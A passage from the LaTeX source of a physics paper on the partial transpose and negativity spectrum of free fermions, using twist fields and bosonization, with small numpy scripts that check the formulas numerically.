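# Ground state of a half-filled open tight-binding chain (illustrative model).
L, lA = 8, 4
H = -(np.eye(L, k=1) + np.eye(L, k=-1))
_, phi = np.linalg.eigh(H)
C = phi[:, : L // 2] @ phi[:, : L // 2].T    # correlation matrix <f_i^dag f_j>
g = np.eye(L) - 2 * C                        # gamma = 1 - 2C

A, B = slice(0, lA), slice(lA, L)
gp = np.block([[-g[A, A], 1j * g[A, B]],
               [1j * g[B, A], g[B, B]]])     # gamma_+ for the partial transpose

U1 = np.diag([-1.0] * lA + [1.0] * (L - lA))  # matrix of (-1)^{F_A}
ev = np.linalg.eigvals(gp)                    # complex, conjugation-symmetric
```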
We can also derive a simple expression for the correlation matrix $\widetilde C=(\mathbb{I}-\widetilde\gamma)/2$ associated with $\rho^{\widetilde{T}_A}$,
\begin{align} \label{eq:cov_pTd}
\widetilde\gamma =\left( \begin{array}{cc}
-\gamma_{AA}^{-1}(\mathbb{I}_A+\gamma_{AB}\gamma_{BA}) & i\gamma_{AA}^{-1} \gamma_{AB} \gamma_{BB}\\
i\gamma_{BA} & \gamma_{BB}
\end{array} \right).
\end{align}
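As a numerical consistency check of Eqs.~(\ref{eq:Omega_Td})--(\ref{eq:cov_pTd}), one can verify that $e^{\widetilde{\Omega}_+}$ is Hermitian and that $\widetilde{\Gamma}_+$ has a purely real spectrum. The sketch below again uses a half-filled open tight-binding chain as an illustrative state (our own model choice) and promotes the reduced $\gamma_+$ to the full Majorana covariance matrix $\Gamma_+=\sigma_2\otimes\gamma_+$:

```python
import numpy as np

# Half-filled open tight-binding chain as a test state (illustrative choice).
L, lA = 8, 4
H = -(np.eye(L, k=1) + np.eye(L, k=-1))
_, phi = np.linalg.eigh(H)
C = phi[:, : L // 2] @ phi[:, : L // 2].T
g = np.eye(L) - 2 * C                           # gamma = 1 - 2C
A, B = slice(0, lA), slice(lA, L)
gp = np.block([[-g[A, A], 1j * g[A, B]],
               [1j * g[B, A], g[B, B]]])        # reduced gamma_+

# Full 2L x 2L Majorana covariance matrix Gamma_+ = sigma_2 (x) gamma_+.
s2 = np.array([[0, -1j], [1j, 0]])
Gp = np.kron(s2, gp)
U1 = np.kron(np.eye(2), np.diag([-1.0] * lA + [1.0] * (L - lA)))  # (-1)^{F_A}

I = np.eye(2 * L)
M = (I + Gp) @ np.linalg.inv(I - Gp) @ U1       # e^{Omega-tilde_+}
Gt = (M - I) @ np.linalg.inv(M + I)             # Gamma-tilde_+ = tanh(.../2)
nus = np.linalg.eigvals(Gt)
```

Hermiticity of $M$ follows algebraically from $\Gamma_+^\dag=U_1\Gamma_+U_1$, and a Hermitian $M$ in turn guarantees that $\widetilde{\Gamma}_+$ is Hermitian, so the $\tilde\nu_j$ are real.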
\section{Spacetime picture for the moments of partial transpose}
\label{sec:spacetime}
In the following two sections, we compute the moments of the partially transposed density matrix and ultimately the logarithmic negativity.
First, we develop a general method using the replica approach \cite{Calabrese2012,Calabrese2013,Herzog2016} and
provide an equivalent spacetime picture of the R\'enyi negativity.
Before we proceed, let us briefly review the replica approach to the entanglement entropy; we then make the connection to our construction of the PT.
A generic density matrix can be represented in the fermionic coherent state as
\begin{align}
\rho = \int d\alpha d\bar\alpha\ d\beta d\bar\beta\ \rho(\bar\alpha,\beta) \ket{\alpha}\bra{\bar\beta} e^{-\bar\alpha \alpha- \bar\beta\beta} ,
\end{align}
where $\alpha$, $\bar\alpha$, $\beta$ and $\bar\beta$ are independent Grassmann variables and we omit the real-space (and possibly other) indices for simplicity.
The trace formula then reads
\begin{align}
Z_{{\cal R}_n}=\text{Tr}[\rho^n] =& \int \prod_{i=1}^n d\psi_i d\bar \psi_i \ \prod_{i=1}^n \left[ \rho(\bar\psi_i,\psi_i)\right] e^{\sum_{i,j} \bar\psi_i T_{ij} \psi_j },
\end{align}
where the subscripts in $\psi_i$ and $\bar\psi_i$ denote the replica indices and ${T}$ is called the twist matrix,
\begin{align} \label{eq:Tmat}
T=\left(\begin{array}{cccc}
0 & -1 & 0 & \dots \\
0 & 0 & -1 & 0 \\
\vdots & \vdots & \ddots & -1 \\
1 & 0 & \cdots & 0 \\
\end{array} \right).
\end{align}
The above expression can be viewed as a partition function on an $n$-sheeted spacetime manifold where the $n$ flavors (replicas) $\psi_i$ are glued in order along the cuts.
Alternatively, one can consider a multi-component field $\Psi= (\psi_1,\cdots,\psi_n)^T$ on a single-sheeted spacetime. This way, when we traverse a closed path through the interval, the field gets transformed as $\Psi \mapsto T \Psi$. Hence, each interval can be represented by two branch points ${\cal T}_n$ and ${\cal T}_n^{-1}$ -- the so-called twist fields -- and the REE of one interval can be written as a two-point correlator~\cite{Casini2005},
\begin{align}
Z_{{\cal R}_n}=\braket{{\cal T}_n(u) {\cal T}_n^{-1} (v)},
\end{align}
where $u$ and $v$ denote the real space coordinates of the two ends of the interval defining the subsystem $A$.
\begin{figure}
\centering
\includegraphics[scale=.9]{Neg}
\caption{\label{fig:neg_mfd}(a) Spacetime manifold associated with ${Z}_{{\cal N}_n}(\alpha)$, Eq.~\eqref{eq:Zalpha}, for $n=4$. The operator $e^{i\alpha F_A}$ twists the boundary condition of the cycles between two successive sheets, shown as the green path with dashed lines. (b)~Equivalent picture in terms of twist field where we define a multi-component field on a single spacetime sheet.}
\end{figure}
Let us now derive analogous relations for the moments of partially transposed density matrix.
Using the definition of the PT in the coherent state basis~\cite{Shap_pTR}
\begin{align}
\label{eq:pT_coh}
( \ket{\psi_A,\psi_B } \bra{\bar\psi_A,\bar\psi_B} )^{T_A} = \ket{ i\bar\psi_A,\psi_B } \bra{
i\psi_A,\bar{\psi}_B},
\end{align}
we write the general expression for the moments of ${\rho^{T_A}} $ as
\begin{align}
{Z}_{{\cal N}_n}^{({\rm ns})}=\text{Tr}[({\rho^{T_A}} )^n] =& \int \prod_{i=1}^n d\psi_i d\bar \psi_i \ \prod_{i=1}^n \left[ \rho(\bar\psi_i,\psi_i)\right]
e^{\sum_{i,j} \bar\psi_{iA} [ T^{-1}]_{ij} \psi_{jA} }
e^{\sum_{i,j} \bar\psi_{iB} T_{ij} \psi_{jB} },
\label{eq:pTR_NS}
\end{align}
where $\psi_{js}$ and $\bar\psi_{js}$ refer to the fields defined within the interval $s=A, B$ of the $j$th replica.
Here, we are dealing with two intervals where the twist matrices are $T$ and $T^{-1}$ as shown in Fig.~\ref{fig:neg_mfd}(a).
Therefore, it can be written as a four-point correlator (Fig.~\ref{fig:neg_mfd}(b))
\begin{align}
{Z}_{{\cal N}_n}^{({\rm ns})}=\braket{{\cal T}_n^{-1}(u_A) {\cal T}_n (v_A) {\cal T}_n(u_B) {\cal T}_n^{-1} (v_B)}.
\end{align}
Note that the order of the twist fields is reversed for the first interval.
From the coherent state representation, we can also write the moments of $\rho^{\widetilde{T}_A}$
\begin{align}
{Z}_{{\cal N}_n}^{({\rm r})}
=\text{Tr}[(\rho^{\widetilde{T}_A} )^n]
=& \int \prod_{i=1}^n d\psi_i d\bar \psi_i \ \prod_{i=1}^n \left[ \rho(\bar\psi_i,\psi_i)\right]
e^{\sum_{i,j} \bar\psi_i^{A} \widetilde T_{ij} \psi_j^{A} }
e^{\sum_{i,j} \bar\psi_i^{B} T_{ij} \psi_j^{B} }.
\label{eq:pTR_R}
\end{align}
The twist matrix for interval A is modified to be
\begin{align} \label{eq:TRmat}
\widetilde{T}=\left(\begin{array}{cccc}
0 & \cdots & 0 & -1 \\
1 & \ddots & \vdots & \vdots \\
0 & 1 & 0 & 0 \\
\cdots & 0 & 1 & 0 \\
\end{array} \right),
\end{align}
which can be viewed as a gauge transformed twist matrix $T^{-1}$. Analogously, Eq.~\eqref{eq:pTR_R} can be written in terms of a four-point correlator
\begin{align}
{Z}_{{\cal N}_n}^{({\rm r})}=\braket{\widetilde{\cal T}_n^{-1}(u_A) \widetilde{\cal T}_n (v_A) {\cal T}_n(u_B) {\cal T}_n^{-1} (v_B)},
\end{align}
where $\widetilde{\cal T}_n$ and $\widetilde{\cal T}^{-1}_n$ are twist fields associated with $\widetilde{T}$.
For fermions with a global $U(1)$ gauge symmetry (i.e., particle-number conserving systems), there is a freedom to twist the boundary conditions along the fundamental cycles of the spacetime manifold (e.g., the dashed-line path in Fig.~\ref{fig:neg_mfd}(a)) by a $U(1)$ phase (or holonomy). The boundary conditions are independent and can in principle differ between different pairs of sheets.
If we assume a replica symmetry (i.e. uniform boundary conditions) $\psi_i \mapsto e^{i\alpha} \psi_i $, the expression for the PT moments in the operator formalism is given by
\begin{align}
\label{eq:Zalpha}
{Z}_{{\cal N}_n}(\alpha)=\text{Tr} [({\rho^{T_A}} e^{i\alpha F_A})^n].
\end{align}
Let us mention that some related quantities, such as $\text{Tr} [(\rho\ e^{i\alpha F})^n]$, were previously introduced and dubbed charged entanglement entropies~\cite{Belin2013}. They were further used to determine symmetry-resolved entanglement entropies, i.e., the contributions to the entanglement entropies from the density matrix projected onto a given particle-number sector~\cite{Sierra2018,Sela2018}.
From \eqref{eq:Zalpha}, we get a family of RNs parametrized by $\alpha$. However, for a generic fermionic system (including superconductors), the $U(1)$ symmetry is reduced to the $\mathbb{Z}_2$ fermion-parity symmetry. Hence, the two quantities of general interest are
\begin{align}
\label{eq:ZR_def}
{Z}_{{\cal N}_n}(\alpha=\pi) &={Z}_{{\cal N}_n}^{({\rm r})}= \text{Tr} [(\rho^{\widetilde{T}_A})^n], \\
{Z}_{{\cal N}_n}(\alpha=0) &= {Z}_{{\cal N}_n}^{({\rm ns})}=\text{Tr}[({\rho^{T_A}} )^n].
\end{align}
We should reemphasize that both quantities are described by a partition function on the same spacetime manifold (Fig.~\ref{fig:neg_mfd}) as in the case of bosonic systems~\cite{Calabrese2013}, while they differ in the boundary conditions along the fundamental cycles of the manifold. In other words, ${Z}_{{\cal N}_n}^{({\rm ns})}$ and ${Z}_{{\cal N}_n}^{({\rm r})}$ correspond to anti-periodic (i.e., Neveu-Schwarz in CFT language) and periodic (Ramond) boundary conditions, respectively.
This can be readily seen by comparing $T^{-1}$ and $\widetilde{T}$.
These boundary conditions correspond to two replica-symmetric spin structures for the spacetime manifold.
This differs from the bosonic PT of fermionic systems~\cite{Coser2016_2,Herzog2016}, where the RN is given by a sum over all possible spin structures. Essentially, the RNs associated with the two types of fermionic PT are identical to two of the terms in the expansion of the bosonic PT in Ref.~\cite{Coser2016_2}.
In what follows, we compute the two RNs for two partitioning schemes:
\begin{itemize}
\item Two \textbf{adjacent intervals}, obtained by fusing the fields at $v_A$ and $u_B$. Hence, the RNs are given in terms of three-point correlators
\begin{align} \label{eq:ZN_NS}
{Z}_{{\cal N}_n}^{({\rm ns})} = \braket{{\cal T}_n^{-1}(u_A) {\cal T}_n^2(v_A) {\cal T}_n^{-1}(v_B) },
\end{align}
and
\begin{align} \label{eq:ZN_R}
{Z}_{{\cal N}_n}^{({\rm r})} = \braket{\widetilde{\cal T}_n^{-1}(u_A) {\cal Q}_n^2(v_A) {\cal T}_n^{-1}(v_B) },
\end{align}
where we introduce the fusion of unlike twist fields,
\begin{align}
{\cal Q}_n^2:= {\cal T}_n \widetilde{\cal T}_n.
\end{align}
\item
\textbf{Bipartite geometry}, where the two intervals together form the entire system, which is in the ground state. This time the RNs are obtained by further fusing the fields at $u_A$ and $v_B$, and the final expressions are therefore given by the two-point correlators
\begin{align} \label{eq:b_ZN_NS}
{Z}_{{\cal N}_n}^{({\rm ns})} = \braket{{\cal T}_n^{-2}(u_A) {\cal T}_n^2(v_A) },
\end{align}
and
\begin{align} \label{eq:b_ZN_R}
{Z}_{{\cal N}_n}^{({\rm r})} = \braket{{\cal Q}_n^{-2}(u_A) {\cal Q}_n^2(v_A) }.
\end{align}
\end{itemize}
\section{The spectrum of partial transpose}
\label{sec:negativity}
As mentioned, the first step in computing the tail distribution of the eigenvalues of the partially transposed density matrix is to find its moments. To this end, it is convenient to work in a basis where the twist matrices are diagonal and to decompose the partition function of the multi-component field $\Psi$ into $n$ decoupled partition functions. For the REE, this leads to
$Z_{{\cal R}_n} = \prod_{k=-(n-1)/2}^{(n-1)/2} Z_{k,n}$, where
\begin{align} \label{eq:Zk}
Z_{k,n} = \braket{{\cal T}_{k,n}(u) {\cal T}_{k,n}^{-1} (v)}.
\end{align}
The monodromy conditions for the field around ${\cal T}_{k,n}$ and ${\cal T}_{k,n}^{-1}$ are $\psi_k\mapsto e^{\pm i2\pi k/n} \psi_k$.
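These momenta can be read off directly from the twist matrix: since $T^n=(-1)^{n-1}\mathbb{I}$ (anti-periodicity), the eigenvalues of $T$ in Eq.~(\ref{eq:Tmat}) are precisely the phases $e^{i2\pi k/n}$ with $k=-(n-1)/2,\dots,(n-1)/2$. A short numerical check (helper names are ours):

```python
import numpy as np

def twist_matrix(n):
    """Twist matrix T: -1 on the superdiagonal, +1 in the lower-left corner."""
    T = -np.eye(n, k=1)
    T[n - 1, 0] = 1.0
    return T

def twist_momenta(n):
    """Momenta k such that the eigenvalues of T are exp(i 2 pi k / n)."""
    return np.sort(np.angle(np.linalg.eigvals(twist_matrix(n))) * n / (2 * np.pi))
```

For odd $n$ the momenta are integers, while for even $n$ they are half-integers, in accordance with the Neveu-Schwarz boundary condition.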
The calculation of the above partition function can be further simplified in terms of correlators of vertex operators using the bosonization technique in (1+1)d. For instance, in the case of REE, (\ref{eq:Zk}) can be evaluated by~\cite{Casini2005}
\begin{align}
Z_{k,n}= \left\langle V_k(u) V_{-k}(v)
\right\rangle,
\end{align}
where $V_k(x) =e^{-i\frac{k}{n} \phi (x)}$ is a vertex operator and the expectation value is taken in the ground state of the scalar field theory ${\cal L}_{\phi }=\frac{1}{8\pi}\partial _{\mu }\phi \partial ^{\mu }\phi$.
The correlation function of the vertex operators is found by
\begin{align} \label{eq:boson_corr}
&\braket{V_{e_1}(z_1)\cdots V_{e_N}(z_N)}\propto \prod_{i<j} \left|z_j-z_i \right|^{2e_i e_j}
\end{align}
where $V_e(z)=e^{i e\phi(z)}$ is the vertex operator and charge neutrality, $\sum_j e_j=0$, is imposed. Hence, the partition function reads
\begin{align} \label{eq:REE_result}
Z_{{\cal R}_n} \propto& \left| u-v \right|^{-2\sum_k \frac{k^2}{n^2}},
\end{align}
leading to the familiar result
\begin{align}
{\cal R}_n = \frac{n+1}{6n} \ln |u-v| + \cdots
\end{align}
for the REE of 1d free fermions.
Note that the ellipses come from the proportionality constant in (\ref{eq:REE_result}); they denote sub-leading terms and may depend on microscopic details.
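The replica sum behind this coefficient is elementary to verify numerically (a small sanity check with our own function name): the prefactor $\frac{1}{1-n}\left(-2\sum_k k^2/n^2\right)$ indeed reduces to $(n+1)/(6n)$.

```python
import numpy as np

def renyi_slope(n):
    """Coefficient of ln|u-v| in R_n, i.e. (1/(1-n)) * (-2 sum_k (k/n)^2)."""
    k = np.arange(-(n - 1) / 2, (n - 1) / 2 + 1)   # replica momenta
    return -2 * np.sum((k / n) ** 2) / (1 - n)
```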
In what follows, we apply the bosonization technique to evaluate ${Z}_{{\cal N}_n}^{({\rm ns})}$ and ${Z}_{{\cal N}_n}^{({\rm r})}$, similar to what we did for the REE. The scaling behavior of the RNs in the lattice model is compared with the analytically predicted slopes (derived below) for the exponents $n=1,\cdots,7$ in Fig.~\ref{fig:Zns_vs_l}, where the agreement is evident. We should note that the slope does not depend on the chemical potential $\mu$ in the Hamiltonian~(\ref{eq:Dirac_latt}).
\subsection{Spectrum of ${\rho^{T_A}} $ }
In the case of RN (\ref{eq:pTR_NS}),
we can carry out a similar \emph{momentum} decomposition as
\begin{align}
{Z}_{{\cal N}_n}^{({\rm ns})} = \prod_{k=-(n-1)/2}^{(n-1)/2} Z^{(\text{ns})}_{k,n},
\end{align}
where
\begin{align} \label{eq:ZRk_NS}
Z^{(\text{ns})}_{k,n} = \braket{{\cal T}_{k,n}^{-1}(u_A) {\cal T}_{k,n}(v_A) {\cal T}_{k,n}(u_B) {\cal T}_{k,n}^{-1} (v_B)}
\end{align}
is the partition function in the presence of four twist fields. We then use (\ref{eq:boson_corr}) to compute the above correlator for various subsystem geometries. We should note that the following results only include the leading-order term in the scaling limit, $\ell_1,\ell_2\to \infty$, where $\ell_1$ and $\ell_2$ are the lengths of the $A$ and $B$ subsystems, respectively.
\begin{figure}[t]
\center
\includegraphics[scale=.93]{Nn_scaling_adjacent}
\caption{\label{fig:Zns_vs_l}
Comparison of numerical (dots) and analytical (solid lines) results for the scaling behavior of the moments of the partial transpose, Eq.~(\ref{eq:pTR_NS}) in the top row and Eq.~(\ref{eq:pTR_R}) in the bottom row, for two subsystem geometries:
(a) two adjacent intervals, and
(b) bipartite geometry. In (a), intervals have equal lengths $\ell_1=\ell_2=\ell$ and $20\leq \ell\leq 200$ on an infinite chain.
In (b), the total system size is $L=400$ and $20\leq \ell\leq 100$.
Different colors correspond to different moments $n$.}
\end{figure}
\subsubsection{Adjacent intervals}
Here, we consider two adjacent intervals (cf.~the top row of Fig.~\ref{fig:Zns_vs_l}(a)).
The final result is given by
\begin{align}
Z_{k,n}^{(\text{ns})}=\left\{ \begin{array}{lll}
\ell_1^{-4\frac{k^2}{n^2}} \ell_2^{-4\frac{k^2}{n^2}} (\ell_1+\ell_2)^{2\frac{k^2}{n^2}} & & \left|k/n\right|< 1/3 \\
f(\ell_1,\ell_2; |k/n|) \cdot (\ell_1+\ell_2)^{2|\frac{k}{n}|(|\frac{k}{n}|-1)} & & \left|k/n\right|> 1/3
\end{array} \right.
\label{eq:Z_NS_adjacent}
\end{align}
where $f(x,y;q) =
\frac{1}{2}\left[
x^{2(q-1)(-2q+1)} y^{2q(-2q+1)} + x\leftrightarrow y \right]
$.
Notice that the exponents change discontinuously as a function of $k$.
This can be understood as a consequence of
the $2\pi$ ambiguity of the $U(1)$ phase that the Fermi field acquires as it goes around the twist fields.
Essentially, we need to find the dominant term with the lowest scaling dimension in the mode expansion (see Appendix~\ref{app:bosonization} for more details).
Adding up the terms in the ${Z}_{{\cal N}_n}^{({\rm ns})}$ expansion, the final expression
\iffalse
\begin{align} \label{eq:fh_latt_neg_NS}
{\cal N}_n^{({\rm ns})}
=& c^{(1)}_n \ln (\ell_1 \ell_2)
+ c^{(2)}_n \ln (\ell_1+\ell_2)
+ 2 \sum_{k/n>1/3} \ln (\ell_1^{2\Delta_k}+\ell_2^{2\Delta_k}) \nonumber \\
&+ \delta_{n,6N+3} \ln (\ell_1^{-2/3}+\ell_2^{-2/3})
+ \cdots
\end{align}
where
\iffalse
\begin{align}
c^{(1)}_n &= -4 \sum_{|\frac{k}{n}|\leq 1/3} \frac{k^2}{n^2} + 4 \sum_{\frac{k}{n}>1/3} \frac{k}{n} (1-\frac{2k}{n} ), \\
c^{(2)}_n &= 2 \sum_{|\frac{k}{n}|\leq 1/3} \frac{k^2}{n^2} - 4 \sum_{\frac{k}{n}>1/3} \frac{k}{n} (1-\frac{k}{n} )
\end{align}
\fi
\begin{subequations}
\begin{align}
c^{(1)}_n &= -4 \sum_{k} \frac{k^2}{n^2} + 4 \sum_{\frac{k}{n}>1/3} \frac{k}{n} + \frac{2}{3} \delta_{n,6N+3}, \\
c^{(2)}_n &= 2 \sum_{k} \frac{k^2}{n^2} - 4 \sum_{\frac{k}{n}>1/3} \frac{k}{n}- \frac{2}{3} \delta_{n,6N+3} , \\
\Delta_k &= \frac{2k}{n}-1.
\end{align}
\end{subequations}
\fi
in the limit of two equal-length intervals $\ell_1=\ell_2$ simplifies to ${\cal N}_n^{({\rm ns})} = c_n \ln \ell + \cdots$, where
\iffalse
\begin{align}
c_n &= -6 \sum_{k} \frac{k^2}{n^2} + 4 \sum_{\frac{k}{n}>1/3} (3\frac{k}{n} -1) \\
&= -\frac{n^2-1}{2n} + 4 \sum_{\frac{k}{n}>1/3} (3\frac{k}{n} -1)
\end{align}
\begin{align}
b_n &= 2 \sum_{k} \frac{k^2}{n^2} - 2 \sum_{\frac{k}{n}>1/3} (2\frac{k}{n}-1)+ \frac{1}{3} \delta_{n,6N+3}\\
&= \frac{n^2-1}{6n} - 2 \sum_{\frac{k}{n}>1/3} (2\frac{k}{n}-1)+ \frac{1}{3} \delta_{n,6N+3}
\end{align}
\begin{align}
b_{n}
=
\left\{
\begin{array}{ll}
\frac{1}{9}\left(2n-\frac{3}{2n}\right) &\ \ \ \ \ n=6N, \\
\frac{1}{9}\left(2n-\frac{1}{n}-1\right) & \ \ \ \ \ n=6N+1, \\
\frac{1}{18n} \left( 2n- 1 \right)^2 &\ \ \ \ \ n=6N+2, \\
\frac{1}{9} \left( 2n+ \frac{3}{n} \right) &\ \ \ \ \ n=6N+3, \\
\frac{1}{18n} \left( 2n+1 \right)^2 &\ \ \ \ \ n=6N+4, \\
\frac{1}{9}\left(2n-\frac{1}{n}+1\right) & \ \ \ \ \ n=6N+5,
\end{array}
\right.
\end{align}
We may drop the constant terms which do not depend on $n$.
\fi
\begin{align}
\label{eq:ns_adj_cn}
c_{n}
=
\left\{
\begin{array}{ll}
-\frac{1}{3} \left( n- \frac{3}{2n} \right) &\ \ \ \ \ n=6N, \\
-\frac{1}{3} \left( n- \frac{1}{n} \right) & \ \ \ \ \ n=6N+1, 6N+5, \\
-\frac{1}{3} \left( n+ \frac{1}{2n} \right) &\ \ \ \ \ n=6N+2,6N+4, \\
-\frac{1}{3} \left( n+ \frac{3}{n} \right) &\ \ \ \ \ n=6N+3,
\end{array}
\right.
\end{align}
\iffalse
and
\begin{align}
\label{eq:ns_adj_bn}
b_{n}
=
\left\{
\begin{array}{ll}
\frac{1}{9}\left(2n-\frac{3}{2n}\right) &\ \ \ \ \ n=6N, \\
\frac{2}{9}\left(n-\frac{1}{n}\right) & \ \ \ \ \ n=6N+1, 6N+5, \\
\frac{1}{9} \left( 2n+ \frac{1}{2n} \right) &\ \ \ \ \ n=6N+2, 6N+4, \\
\frac{1}{9} \left( 2n+ \frac{3}{n} \right) &\ \ \ \ \ n=6N+3,
\end{array}
\right.
\end{align}
\fi
where $N$ is a non-negative integer.
It is worth recalling that for bosonic systems the spectrum of the PT contains only positive and negative real eigenvalues. As a result, the moments show an even/odd effect.
Here, however, the moments ${Z}_n^{(\text{ns})}$ show a cyclic behavior with a periodicity of six, which signals that the eigenvalues may carry complex phases that are multiples of $2\pi/6$. As we will see below, this is indeed the case in our numerical calculations. We should also note that the above result can be obtained from the adjacent limit $v_A\to u_B$ of two disjoint intervals (\ref{eq:ZRk_NS}), as explained in Appendix~\ref{app:moments}. Taking this limit is a bit tricky and was previously overlooked in Ref.~\cite{Herzog2016}, where it was incorrectly deduced that ${Z}_{{\cal N}_n}^{({\rm ns})}=0$ for two adjacent intervals.
We now discuss the spectrum of ${\rho^{T_A}} $ for two adjacent intervals. It is instructive to look at the many-body eigenvalues as obtained in \eqref{eq:mb_eigs} from the single-body eigenvalues of the covariance matrix (\ref{eq:metal_pt}).
From the numerical observation that $\text{Im}(\nu_k)\neq0$, we may drop the $u_l$ factor in (\ref{eq:mb_eigs}). Hence, the many-body spectrum simplifies to
\begin{align}
\lambda_{\boldsymbol{\sigma},\boldsymbol{\sigma'}}=
\prod_{\sigma_k=\sigma_k'}
\omega_{R\sigma_k}
\prod_{\sigma_k=-\sigma_k'}
\omega_{I\sigma_k'},
\end{align}
where
\begin{subequations}
\begin{align}
\omega_{R\sigma_k}&= \frac{1+|\nu_k|^2 + 2\sigma_k \text{Re} [\nu_k]}{4},\\
\omega_{I\sigma_k}&= \frac{1-|\nu_k|^2 + 2 \sigma_k i \text{Im} [\nu_k]}{4},
\end{align}
\end{subequations}
and $\sigma_{k}=\pm$ is a sign factor. We should note that the complex and negative real eigenvalues come from products of the $\omega_{I\sigma_k}$ factors. This fact immediately implies that for every complex eigenvalue $\lambda_j$, $\lambda_j^\ast$ is also in the spectrum, since $\omega_{I-\sigma_k}=\omega_{I\sigma_k}^\ast$. Moreover, the negative eigenvalues are at least two-fold degenerate.
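To make this structure concrete, the following minimal Python sketch builds all many-body eigenvalues from a handful of single-particle eigenvalues $\nu_k$ (the values below are invented for illustration, not taken from an actual chain) and checks the conjugation symmetry of the spectrum, as well as the normalization $\text{Tr}\,{\rho^{T_A}}=1$, which follows because the four per-mode factors sum to one.

```python
import itertools
import numpy as np

# Illustrative single-particle eigenvalues nu_k of the transformed covariance
# matrix (made-up numbers with Im(nu_k) != 0, as observed numerically).
nu = [0.9 + 0.3j, -0.2 + 0.7j, 0.1 - 0.5j]

def mode_factors(nu_k):
    """Per-mode factors omega_{R,+-} (real) and omega_{I,+-} (complex conjugates)."""
    wRp = (1 + abs(nu_k)**2 + 2 * nu_k.real) / 4
    wRm = (1 + abs(nu_k)**2 - 2 * nu_k.real) / 4
    wIp = (1 - abs(nu_k)**2 + 2j * nu_k.imag) / 4
    wIm = (1 - abs(nu_k)**2 - 2j * nu_k.imag) / 4
    return [wRp, wRm, wIp, wIm]

# Many-body spectrum: pick one of the four factors per mode, 4^N products in total.
spectrum = [np.prod(choice)
            for choice in itertools.product(*(mode_factors(n) for n in nu))]

# omega_{I,-} = conj(omega_{I,+}) and omega_{R,+-} are real, so the spectrum
# is closed under complex conjugation; the four factors of each mode sum to 1,
# enforcing Tr rho^{T_A} = sum of eigenvalues = 1.
conj_closed = all(any(np.isclose(lam.conjugate(), mu_) for mu_ in spectrum)
                  for lam in spectrum)
```

This is a sketch of the eigenvalue construction only; on an actual lattice the $\nu_k$ would come from diagonalizing the transformed covariance matrix (\ref{eq:metal_pt}).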
In the case of free fermions, we numerically observe that $\omega_{I\pm}\to|\omega_{I\pm}|e^{\pm i\frac{2\pi}{6}}$ as we go towards the thermodynamic limit $N_A=N_B\to \infty$.
As a result, the many-body eigenvalues are divided into two groups: first, real positive eigenvalues, and second, the complex or negative eigenvalues which take a regular form $\lambda_j\approx |\lambda_j| e^{\pm i\frac{\pi}{3} s_j}$ where $s_j=1,2,3$.
Figure~\ref{fig:rT_spec}(a) shows the numerical spectrum of ${\rho^{T_A}} $. To explicitly demonstrate the quantization of the complex phase of eigenvalues, we plot a histogram of the complex phase in Fig.~\ref{fig:rT_spec}(b) where sharp peaks at integer multiples of $\pi/3$ are evident.
Due to this special structure of the eigenvalues, the moments of ${\rho^{T_A}} $ can be written as
\begin{align}
\label{eq:Zns_spec}
{Z}_{{\cal N}_n}^{({\rm ns})} &= \sum_k |\lambda_k|^n e^{ \frac{i\pi ns_k }{3} } \nonumber \\
&= \sum_j \lambda_{0j}^n
+2\cos\left(\frac{\pi n}{3}\right) \sum_j |\lambda_{1j}|^n
+2\cos\left(\frac{2\pi n}{3}\right) \sum_j |\lambda_{2j}|^n
+ \cos\left(n\pi\right) \sum_j |\lambda_{3j}|^n,
\end{align}
where $\{\lambda_{\alpha j}\}, \alpha=0,1,2,3$ denote the eigenvalues along $\angle\lambda= \alpha\pi/3$ branches. Note that $\{\lambda_{0j}\},\{\lambda_{3j}\}$, i.e., positive and negative real eigenvalues, are treated separately, while $\{\lambda_{1j}\}$ and $\{\lambda_{2j}\}$ represent the eigenvalues for both $\angle \lambda=\pm \pi/3$ and $\angle \lambda=\pm 2\pi/3$ branches. A consequence of Eq.~(\ref{eq:Zns_spec}) is that there are four linearly independent combinations of the eigenvalues in ${Z}_{{\cal N}_n}^{({\rm ns})}$. This exactly matches the four possible scaling behaviors of ${Z}_{{\cal N}_n}^{({\rm ns})}$ from our continuum field theory calculations (\ref{eq:ns_adj_cn}).
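The branch decomposition (\ref{eq:Zns_spec}) can be checked directly on a toy spectrum. In the sketch below the branch moduli are invented for illustration; the point is only that summing $\lambda^n$ over a conjugation-symmetric spectrum with phases quantized in units of $\pi/3$ reproduces the four-cosine structure.

```python
import numpy as np

# Invented branch moduli (illustrative only): positive reals, |lambda| on the
# +-pi/3 branches, |lambda| on the +-2pi/3 branches, and negative reals.
lam0, lam1, lam2, lam3 = [0.5, 0.1], [0.2, 0.05], [0.15], [0.08]

def Z_direct(n):
    """Sum lambda^n over the full conjugation-symmetric spectrum."""
    full = (list(lam0)
            + [l * np.exp(1j * np.pi / 3) for l in lam1]
            + [l * np.exp(-1j * np.pi / 3) for l in lam1]
            + [l * np.exp(2j * np.pi / 3) for l in lam2]
            + [l * np.exp(-2j * np.pi / 3) for l in lam2]
            + [-l for l in lam3])
    return sum(l**n for l in full)

def Z_branch(n):
    """Branch decomposition of the moments, Eq. (eq:Zns_spec)."""
    return (sum(l**n for l in lam0)
            + 2 * np.cos(np.pi * n / 3) * sum(l**n for l in lam1)
            + 2 * np.cos(2 * np.pi * n / 3) * sum(l**n for l in lam2)
            + np.cos(np.pi * n) * sum(l**n for l in lam3))
```

For every integer $n$ the two evaluations agree, and the imaginary part of the direct sum cancels between conjugate branches.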
\begin{figure}
\center
\includegraphics[scale=.7]{adj_angle_abs}
\caption{\label{fig:rT_spec} Spectral properties of ${\rho^{T_A}} $ for two adjacent intervals with length $\ell$ on an infinite chain. (a) Many-body eigenvalues are plotted over the complex plane. The solid gray lines are guides for the eyes and a hint for the phase quantization. (b) Histogram of complex phases of eigenvalues which indicates nearly quantized phases in units of $\pi/3$. (c) Tail distribution function of modulus of eigenvalues. The solid line is the analytical result (\ref{eq:T_ns_abs}).
To compute the many-body spectrum, we truncate the single-particle spectrum to the $28$ eigenvalues with the largest Euclidean distance from $\pm 1$ on the complex plane.}
\end{figure}
As a first characterization of the negativity spectrum, we compute the distribution of the modulus of the eigenvalues. To this end, it is sufficient to consider ${Z}_{{\cal N}_n}^{({\rm ns})}$ for $n$ a multiple of six, $n=6N$, for which ${Z}_{{\cal N}_n}^{({\rm ns})}=\sum_k |\lambda_k|^n$. Substituting (\ref{eq:ns_adj_cn}) for $b$ and $a$ in (\ref{eq:Pdist}) and (\ref{eq:Tdist}), we get
\begin{subequations}
\begin{align}
\label{eq:P_ns_abs}
